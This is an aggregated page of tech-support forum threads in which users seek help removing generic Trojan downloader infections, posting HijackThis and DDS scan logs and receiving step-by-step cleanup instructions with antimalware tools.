C:\WINDOWS\System32\locator.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Free\avgwb.dat
C:\Program Files\Grisoft\AVG Free\avgvv.exe
C:\download\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Verizon Online
R1 - HKCU\Software\Microsoft\Windows\Curre... Read more

A:Solved: Trojan Virus Downloader.Generic.QIF

14 more replies
Answer Match 68.88%

Hi all okay wow I honestly have no clue how I got this thing. I have windows 8 Basic 64 bit.

I have this virus and cannot seem to get rid of it. I have tried TDSkiller, I have tried GMR Rikit. I have done Malwarebyte Rikit.

Can anyone help me get rid of this thing?

Thanks so much
 

A:Trojan Horse Downloader.Generic 13.BMKE

16 more replies
Answer Match 68.88%

I am running XP service pack 3 on my dell inspiron 6400 laptop which has 2gb of ram. Yesterday I accidentally downloaded a suspicious file which has installed a trojan virus on my laptop. I have run the AVG computer scanner and I have run spybot (which can't remove one file); I am now running trojanhunter, which so far has not found anything.

When I turn on my laptop my firewall has been turned off, and when I am surfing on firefox I get pop-ups from avg telling me that I have a "trojan horse downloader.generic.8.AICH". When I click heal it tells me that the file is not there and cannot be deleted, and when I click move to vault the warning disappears, but when I look in the virus vault it is empty.

Does this sound like a dangerous thing to be happening? I am worried that my passwords etc. are in jeopardy.

thanks in advance,
josh

A:Trojan Horse Downloader.Generic.8.AICH

Hello and welcome to TSF

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please start a new thread in our Virus/Trojan/Spyware forum along with the required logs

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

1 more replies
Answer Match 68.88%

I'm running XP Pro (SP3). AVG anti-virus... found a registry key with reference to infected file
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\HP Component Manager
Am I infected or is this a false/positive
JP

A:Trojan Horse Downloader Generic - hpcmpmgr.exe

Do you have an HP Printer (or Printer/Copier/Scanner/Fax)?
Did AVG quarantine the infected files?

Please see this post, reply by Moderator boopme, dated Feb 9 2010, 02:36 PM for how to run an ESET scan (includes link to ESET):
http://www.bleepingcomputer.com/forums/t/293472/hazikubudll-rundll32exe/

I am copying/pasting instructions provided by boopme and quietman7 (Moderators on this site):

If you have Spybot installed temporarily disable it.

Next run ATF:
Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".
Please download ATF Cleaner by Atribune & save it to your desktop.
Double-click ATF-Cleaner.exe to run the program.
Under Main "Select Files to Delete" choose: Select All.
Click the Empty Selected button.
If you use Firefox browser click Firefox at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browser click Opera at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.

Next run MBAM (MalwareBytes):
NOTE: Before saving MBAM please rename it to zztoy.exe....now save it to your desktop.
Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link
MBAM may "make changes to your registry" as part of its disinfection routine. If using other security... Read more

2 more replies
Answer Match 68.88%

I need help removing this trojan:
Trojan Horse Downloader. Generic 7.NTE
winctrl32.dll (Unable to delete)
System is running XP SP3

Please Advise!

HiJackThis.log
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:16:26 AM, on 8/30/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\System32\DSentry.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
c:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe
C:\Program Files\ScanSoft\OmniPagePro12.0\Opware12.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Prog... Read more

A:Trojan Horse Downloader. Generic 7.NTE - Winctrl32.dll

Bump, Please!

8 more replies
Answer Match 68.88%

I am having some trouble removing this from my system. I have used AVG free, Avast free, Spybot, and have even deleted all of the files from the virus reports, in Safe Mode, but I cannot seem to get rid of this little bugger.

The problem manifests itself by telling the user that they have a virus, and suggests that you 'click here' to download the virus removal program. Of course, you end up downloading the virus.

If you need more information to help, I can copy over the reports from AVG.

Perhaps someone has experience with this one and can lead me in the right direction.
 

A:Trojan Horse Downloader.Generic 6.AFLG

Hi and welcome

Go to here and download 'Hijack This!' self installer.
Save it to the desktop or other suitable place. DO NOT just press run from the website
Double click on the file and it will install to C:\program files\hijackthis and create an entry in the start menu.
Click on the entry in start menu to run HijackThis
Click the "Scan" button, when the scan is finished the scan button will become "Save Log" click that and save the log.
Go to where you saved the log and click on "Edit > Select All" then click on "Edit > Copy" then Paste the log back here in a reply.
It will possibly show issues deserving our attention, but most of what it lists will be harmless or even required,
so do NOT fix anything yet.
 

1 more replies
Answer Match 68.88%

My virusscan detected a trojan on my computer which could not be cleaned, quarantined, or deleted. The trojan is called generic downloader.b, with the file name ABoxInst_int14[1].exe.

Here's my HJT log, thanks in advance =)
David

Logfile of HijackThis v1.99.1
Scan saved at 11:40:04 AM, on 18/06/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RunDll32.exe
C:\Program Files\Roxio\Easy CD Creator 6\DragToDisc\DrgToDsc.exe
C:\Program Files\Netropa\Multimedia Keyboard\nhksrv.exe
C:\Program Files\Roxio\Easy CD Creator 6\AudioCentral\RxMon.exe
C:\WINDOWS\system32\cisvc.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
c:\program files\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcdetect.exe
C:\WINDOWS\system32\LVCOMSX.EXE
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\Netropa\Multimedia Keyboard\MMKeybd.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Progra... Read more

A:Trojan: generic downloader.b - filename ABoxInst_int14[1].exe

Hi theicky and welcome to TSF.

There's nothing obvious showing in your log, so we'll do some cleaning and see what turns up.


You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.



Downloads
Please download Cleanup! or use this Alternate Link if the main link does not work and install it. You will use this later.
*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does NOT make backups. If you have any files in any TEMP directory and you need to keep them, then please MOVE THEM NOW!


Download Ewido Anti-Malware
Install Ewido Anti-Malware
When installing, under "Additional Options" uncheck:
Install background guard
Install scan via context menu

Double-click the icon on Desktop to launch Ewido

You will need to update Ewido to the latest definition files.
On the left hand side of the main screen click update.
Then click on Start Update.
The update will start and a progress bar will show the updates being installed.
If you are having problems with the updater, you can use this link to manually update Ewido.
When you have finished updating, EXIT Ewido.



Reboot
Reboot your system in Safe Mode. Restart the computer. The computer begins processing a se... Read more

1 more replies
Answer Match 68.88%

I've got this new Trojan that everyone seems to be catching. Any thoughts on how to get rid of it? I've got AVG and it keeps healing it, but it just keeps coming back. I normally use Mozilla, but there are a few sites that I have to use IE for or I would wipe it from my computer. Thanks for any help.

Logfile of HijackThis v1.99.1
Scan saved at 4:29:48 PM, on 4/7/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\system32\RUNDLL32.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\apdproxy.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINNT\system32\ctfmon.exe
C:\Program Files\VIA\RAID\raid_tool.exe
C:\Program Files\Belkin\Nostromo\nost_LM.exe
C:\Program Files\Adobe\Photoshop Elements 4.0\PhotoshopElementsFileAgent.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ewido anti-malware\ewidoctrl.exe
C:\WINNT\system32\nvsvc... Read more

A:Solved: Trojan horse Downloader.Generic.NON

6 more replies
Answer Match 68.88%

I just have this one lingering infection.
HEUR:Trojan-Downloader.Win32.Generic

Kaspersky always identifies it at the start up and is able to delete it but for some apparent reason, it can't fully get rid of it. It appears every time I start up the PC. I will post a picture of the log.

Not sure what the aswMBR scan log is, if you elaborate I have no problem uploading it or downloading the program to get you it!
Help a brotha out!
Thank you.

-Hugo
 

A:HEUR:Trojan-Downloader.Win32.Generic

I should add that I have also completely disinfected google chrome. Unfortunately it deleted all my bookmarks, maybe someone has a method of recuperating?

AND if all comes to worse, I should also add that I have the free Windows 10 upgrade available to me. I just haven't installed it or found the need to do it.

Thanks!
 

1 more replies
Answer Match 68.88%

AVG is detecting this and said something about C:\Windows\System32\svchost.exe. I just ran Spybot, Adaware, CCleaner, and AVG. (I by mistake installed the Yahoo toolbar with CCleaner ;( )

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:09:48 AM, on 8/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Linksys EasyLink Advisor\LinksysAgent.exe
C:\PROGRA~1\AIM\aim.exe
C:\WINDOWS\system32\spoolsv.exe
C:\program files\steam\steam.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\oodag.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\PROGRA~1\AVG\AVG8\avgemc.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
... Read more

A:Trojan horse downloader generic 7.AMDP

2 more replies
Answer Match 68.88%

Hi, I downloaded vundofix and it removed some of the files but there are still a few it has left on. My daughter has got avg anti virus. I'm not sure on what to do now. The files it's left on are

c:\winnt\system32\olyegecl.dll
c:\winnt\system32\uvyxx.bak1
c:\winnt\system32\uvyxx.ini
c:\winnt\system32\xxyvu.dll

I don't know if this helps or not but I'm not sure on what else to do. Can anyone help?
 

A:Solved: trojan horse downloader.generic.4.dem

16 more replies
Answer Match 68.88%

Hi Guys,

I have borrowed the boss's laptop for a couple of weeks and it has become infected with a few trojan horse viruses.

I need to remove these before I give the laptop back.

I have read other threads with similar problems and I have downloaded HiJack this.
Any help would be appreciated.

this is the log file

Logfile of HijackThis v1.99.1
Scan saved at 7:11:22 PM, on 19/04/07
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\system32\bmwebcfg.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\necmfk\necmfk.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Java\j2re1.4.2_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc... Read more

More replies
Answer Match 68.88%

I am looking for advice on a Trojan horse virus that was picked up by AVG on my computer. The virus is called trojan horse downloader.generic.13.BVLU. I've done a search online and can't find anything on this specific virus.
Although AVG spotted the virus I am not sure if it was blocked or whether it has infected my computer. I have deleted the file that AVG said the virus was found in and I have carried out scans using AVG, Avast, Malwarebytes and Kaspersky TDSSKiller. None of these has detected an infection. Should I assume there is no infection or can this virus hide away from the above scanners? Is there something else I can do to determine for sure if my computer is infected or not?
Thanks

A:trojan horse downloader.generic.13.BVLU

Welcome aboard

Download Security Check from here or here and save it to your Desktop.
Double-click SecurityCheck.exe
Follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2 SecurityCheck may produce some false warning(s), so leave the results reading to me.

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender
Other Services
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Please download MiniToolBox and run it.
Checkmark following boxes:
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Devices (do NOT change any settings here)
List Users, Partitions and Memory size
Click Go and post the result.

Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/products/malwarebytes_free to your desktop.
* Double-click mbam-setup.exe and follow the prompts to install the program.
* At the end, be sure a checkmark is placed next to Up... Read more

13 more replies
Answer Match 68.88%

Something disabled my AVG 8.0. I downloaded AVG 8.5 and ran a scan. In addition to a list of tracking cookies AVG reported finding "Trojan Horse Downloader. Generic 8.BMXD". I don't know how long AVG was down or what I might have downloaded while I was unprotected. Computer is sluggish.

DDS (Ver_09-07-30.01) - NTFSx86
Run by Craig at 15:59:17.71 on Sun 09/13/2009
Internet Explorer: 6.0.2900.5512
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.405 [GMT -5:00]

AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\IBM\IBM Rapid Restore Ultra\rrpcsb.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
c:\program files\lenovo\system update\suservice.exe
C:\WINDOW... Read more

A:trojan horse downloader Generic 8.BMXD

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

18 more replies
Answer Match 68.88%

Dear Tech Support Guys

I have a virus on my pc - avg says that it is trojan downloader generic 13 but I cannot get rid of it using avg or anti malware software. I attach the HijackThis log, dds logs and ark.txt log and would be very very grateful for any assistance. The virus has wiped off a lot of files on my pc and when I go to the start menu, I cannot locate "run" to enter instructions I have read about. Whenever I access the internet, I am directed towards various websites I did not request.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:33:25, on 14/11/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\TOSHIBA\Toshiba Online Product Information\TOPI.exe
C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\... Read more

More replies
Answer Match 68.04%

Hi Techguy! My home page has been hijacked by about:blank, & avg keeps telling me it's found the above trojan horse. I've run avg, ad-aware & spybot, with no joy. I don't know what info you need, but we run on Windows XP. I've run hijack this, here's my log file.

Logfile of HijackThis v1.99.1
Scan saved at 2:42:26 PM, on 4/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\nvctrl.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\MessengerPlus! 3\MsgPlus.exe
C:\Program Files\WordWeb\wweb32.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\system32\slmdmsr.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\iPod\bin\iPodServ... Read more

A:Solved: about:blank & trojan horse downloader generic.NON

16 more replies
Answer Match 68.04%

Hi. I've been trying to get rid of some viruses to no avail. It slows down my internet connection and I can't even update ewido, avg, spybot and adaware because I think the virus prevents my computer from connecting to the internet properly. I tried cleaning it with AVG and ewido to no avail because it keeps coming back. I tried online scans but my net connection tends to "hang" after 5 minutes so it never gets done. My PC also hangs a lot.

Help please. Thanks! Here is my scan report from Ewido and my Hijack This

Log:



Logfile of HijackThis v1.99.1
Scan saved at 11:46:07 PM, on 11/3/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\WINDOWS\System32\Fast.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\msinit.exe
C:\WINDOWS\mspathfinder
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\tp4mon.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Java\jre1.5.0_04\bin\jusched.exe
C:\WINDOWS\System32\msconfigx32.exe
C:\WINDOWS\System32\s3hotk... Read more

A:can't get rid of stubborn viruses: Trojan horse Downloader.Generic.Lf, etc.

Please Turn off Word Wrap in your text editing program then post a new log. In Notepad this is done by clicking on Word Wrap in the Edit menu to remove the check. This will make the log much easier for the analysts to read.

1 more replies
Answer Match 68.04%

... and a partridge in a pear tree. Hello and thank you in advance for your help. The following applies to my Win7 PC running the IE9 browser.

I need assistance in order to remove a rootkit IRP Hook\Driver\iaStor IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0xFFFFFA8005F965A4 (the numbers after the first A vary with each scan) and Trojan horse downloaders Generic25.BCBS C:\Windows\System32\svchost.exe (1688):\memory_00d00000 and Generic13.CAM C:\Windows\System32\svchost.exe (1688):\memory_00a00000 (the numbers after svchost.exe and memory vary with each scan). I cannot get rid of these three.

I tried MS Security Essentials first, MS Defender, then AVG, including the rescue CD, and Malwarebytes. I have also run rkill. AVG was the only one to even pick them up. I'm told to reboot and all would be well, alas, that is not so. The three apps removed many other viruses found, such as Exploit.Kit.AI and Win32/Heur.dropper but not these three buggers. TDSSKiller will not run, even after renaming, nor will aswMBR - though I didn't rename that as I don't believe I saw that as an option. I have uninstalled and reinstalled Java and Adobe (haven't reinstalled the Reader yet and just reinstalled Flash from this site when registering) and have used the Intel utility driver update check to attempt a fix for iastor.exe. (nothing major there - just optional display update available).

Love an IT puzzle - but I've about ha... Read more

A:IRP Hook Rootkit, Trojan Downloader Generic, IE9 redirects, pop ups

Greetings and Welcome to The Forums!!

My name is Gringo and I'll be glad to help you with your malware problems.

I have put together some things for you to keep in mind while I am helping you to make things go easier and faster for both of us.

Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.

NOTE: At the top o... Read more

32 more replies
Answer Match 68.04%

Ok, so every time I open up an Internet Explorer window I automatically get told by AVG that I have Trojan horse Downloader.Generic.NON on my PC, it finds it twice at least. Also even before I go anywhere on the internet I look in my History and find linkschain.net... I can only guess that this is where the Trojan has originated from. Help me guys, AVG can't tackle this thing.
 

A:Solved: AVG found Trojan horse Downloader.Generic.NON

14 more replies
Answer Match 68.04%

Hi, we have McAfee running on our computer and about 3 days ago it started showing warnings about pc infected with this trojan. My attempts of cleaning pc from this trojan have all failed.
I have read all the stickies, installed and run the recommended antispyware programs. They have detected other infected files, cleaned those and here I am after all this cleaning, still getting the warning about the generic downloader.
Thanks much in advance for the help!

Here is my HijackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 10:36:21 PM, on 2/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PROGRA~1\mcafee.co... Read more

A:Trojan found - xlibgfl254.dll infected by Generic Downloader.bt

Hi megan,

Welcome to Tech Support Forum!

I apologize for the delay in getting to your log. The helpers here are all volunteers and are not online 24-hours a day. If you are still having malware problems I will be glad to help.

OK, let's do this first.

Please download CCleaner (freeware) and save it to your desktop:
Run the CCleaner installer.
During installation process, please UNCHECK "Add CCleaner Yahoo! Toolbar".
Once installed, run CCleaner and click the Windows tab.
Select the following:
Check everything under the Internet Explorer section.
Check everything under the Windows Explorer section.
Check everything under the System section.
Check ONLY Old Prefetch data under the Advanced section.

Then, click the Applications tab:
UNCHECK everything there.

Next, click the Options button, then click the Advanced button:
UNCHECK : "Only delete files in Windows Temp folders older than 48 hours".

Next, click the Cleaner button, then click the Run Cleaner button (bottom right), then Exit.

CAUTION : Please do NOT use the Issues button. This is a built-in registry cleaner. If you don't know how to use it, you may cause irreparable damage to your system.


NEXT:

Let's run an online scan to make sure we're not leaving anything behind.

